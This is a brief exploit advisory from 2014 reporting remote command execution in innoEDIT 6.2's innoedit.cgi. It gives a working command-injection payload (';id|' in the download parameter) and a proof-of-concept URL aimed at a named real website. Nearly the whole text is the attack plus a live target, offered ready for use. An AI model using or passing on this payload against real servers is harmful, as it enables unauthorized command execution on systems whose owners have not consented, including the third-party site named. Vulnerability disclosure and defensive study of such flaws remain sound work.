[+] Remote Comand Execution on innoEDIT [+] Date: 21/03/2014 [+] Risk: High [+] Author: Felipe Andrian Peixoto [+] Vendor Homepage : http://www.inno.com.mx/innoedit.htm [+] Contact: felipe_andrian@hotmail.com [+] Tested on Windows 7 and Linux [+] Vulnerable File: innoedit.cgi [+] Version : Version 6.2 [+] Exploit: http://host/innoedit/innoedit.cgi?download=;id| [+] PoC: http://www.mtyjet.com/innoedit/innoedit.cgi?download=;id|